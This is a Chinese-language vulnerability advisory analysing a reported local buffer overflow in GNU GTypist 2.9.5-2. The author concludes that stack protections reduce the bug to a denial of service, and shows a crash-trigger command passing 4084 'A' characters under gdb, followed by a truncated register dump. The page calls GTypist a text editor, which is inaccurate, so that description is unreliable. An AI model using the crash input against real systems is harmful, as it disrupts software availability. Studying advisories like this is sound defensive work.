GNU GTypist 2.9.5-2 - 本地缓冲区溢出漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Author:** k0Sh1** ### 漏洞分析 GNU GTypist是一款Linux下的文本编辑软件,比较尴尬的是在我调试过程中,发现gtypist实际上开启了CNARAY和NX,也就是说,按照PoC给出的Exploit应该是没法利用的,这个应该是一个拒绝服务漏洞,该漏洞是由于当输入的文件路径是一个畸形文件的时候,首先会执行一次strcpy_chk拷贝,这个拷贝过程会因为畸形文件导致程序进入错误处理而退出,下面对此漏洞进行详细分析。 首先gdb运行,直接通过run `python -c 'print "\x41"*4084'`运行,会发现程序中断。 ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0xb12 ECX: 0xb12 EDX: 0x6 ESI: 0x3e ('>') EDI: 0xb7f56000 --> 0x1a5da8 EBP: 0xbfffb6a8 --> 0xb7f0fdd6 ("buffer overflow detected") ESP: 0xbfffb434 --> 0xbfffb6a8 --> 0xb7f0fdd6 ("buffer overflow detected") EIP: 0xb7fdebe0 (<__kernel_vsyscall+16>:pop ebp) EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0xb7fdebdc <__kernel_vsyscall+12>:nop 0xb7fdebdd <__kernel_vsyscall+13>:nop 0xb7fdebde <__kernel_vsyscall+14>:int 0x80 => 0xb7fdebe0...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息